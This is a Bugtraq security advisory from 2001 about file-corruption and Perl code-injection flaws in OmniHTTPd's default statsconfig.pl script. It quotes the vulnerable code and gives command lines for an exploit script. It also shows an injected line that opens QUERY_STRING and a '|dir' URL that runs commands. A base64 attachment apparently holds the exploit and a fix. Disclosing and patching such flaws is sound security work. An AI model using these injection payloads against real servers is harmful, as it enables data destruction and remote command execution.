[18645] in bugtraq
Vulnerabilities in OmniHTTPd default installation
daemon@ATHENA.MIT.EDU (joetesta@HUSHMAIL.COM)
Tue Jan 16 14:09:22 2001
Content-type: multipart/mixed;
boundary="Hushpart_boundary_gdnueOZXvCnTXlnYCpeeCOzpiquYlHpB"
Mime-version: 1.0
Message-ID: <200101152215.OAA04869@user7.hushmail.com>
Date: Mon, 15 Jan 2001 17:19:12 -0800
Reply-To: joetesta@HUSHMAIL.COM
From: joetesta@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
--Hushpart_boundary_gdnueOZXvCnTXlnYCpeeCOzpiquYlHpB
Content-type: text/plain
Vulnerabilities in OmniHTTPd default installation
Overview
Two vulnerabilities exist within the 'statsconfig.pl' script that
comes with OmniHTTPd v2.07 and is installed by default. The first
allows a remote attacker to corrupt any file in the system. The second
allows arbitrary code to be inserted into '/cgi-bin/stats.pl'.
Details
Here is the offending code:
if ($FORM{'mostbrowsers'}) {
$mostbrowsers_str = '$most_browsers = "' .
$FORM{'mostbrowsers'} . '";';
}
...
unless (-f "$FORM{'cgidir'}/stats.prg") {
$error .= "<LI>Config couldn't find the file stats.prg in
your cgi-bin directory.";
[ exit(); ]
}
...
$cgifile = "$FORM{'cgidir'}/stats.pl";
$progfile = "$FORM{'cgidir'}/stats.prg";
open(CGI, "> $cgifile");
open(PROG, "$progfile");
print CGI "#!/usr/local/bin/perl5\n";
print CGI "#AutoConfiged by Statsconfig.pl\n\n";
print CGI "$deflimit_str\n$mostip_str\n$mostreq_str\n$mostbrowsers_str\n$timelog_str\n$mostipnum_str\n$mostreqf_str\n$mostbrowsernum_str\n$logloc_str\n$imagebar_str\n$serveradd_str\n$barwidth_str\n$barheight_str\n$listpass_str\n$bgcolor_str\n$bgimage_str\n$ttBGcolor_str\n\n$perllib_str\n";
...
None of the variables in %FORM are filtered. An attacker simply
sets $FORM{'cgidir'} to the absolute path of any file in the system
(padded with a null, of course), and that file will be corrupted. Note
that because absolute file names are used, this exploit is not
restricted to the drive the webserver resides on.
Code injection is achieved by setting $FORM{'mostbrowsers'} to any
legal value, followed by a semicolon and the payload.
Exploit
I've written an exploit in PERL to demonstrate the two vulnerabilities.
To corrupt a file:
perl omnismash.pl localhost 80 -corrupt c:/autoexec.bak
The file you choose will be overwritten with approximately 470
bytes of PERL code.
To inject code into '/cgi-bin/stats.pl':
perl omnismash.pl localhost 80 -inject c:/httpd/cgi-bin
You must pass the absolute path to the cgi-bin directory for this
to work. This exploit is hard-coded to insert the following line:
if( $ENV{'QUERY_STRING'} ) { open( QS,$ENV{'QUERY_STRING'} ); }
With that done, point your browser to
'http://localhost/cgi-bin/stats.pl?|dir'. You will see a directory
listing of '/cgi-bin'.
Solution
Erase 'statsconfig.pl' along with any other unnecessary files in your
'cgi-bin'. If this is not possible in your particular situation,
replace your current 'statsconfig.pl' file with the attached
'statsconfig.fixed' file. This version allows 'statsconfig.pl' to be
invoked only from localhost.
Vendor Status
Omnicron Technologies Corporation was notified via
<info@omnicron.ab.ca> and <support@omnicron.ab.ca> on Monday,
January 8, 2001. No reply was received.
Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_gdnueOZXvCnTXlnYCpeeCOzpiquYlHpB
Content-Disposition: attachment
Content-type: application/zip; name="2000.01.08.OmniHTTPd.zip"
Content-Transfer-Encoding: base64
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
AAAAkhIAAAAA
--Hushpart_boundary_gdnueOZXvCnTXlnYCpeeCOzpiquYlHpB--
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.
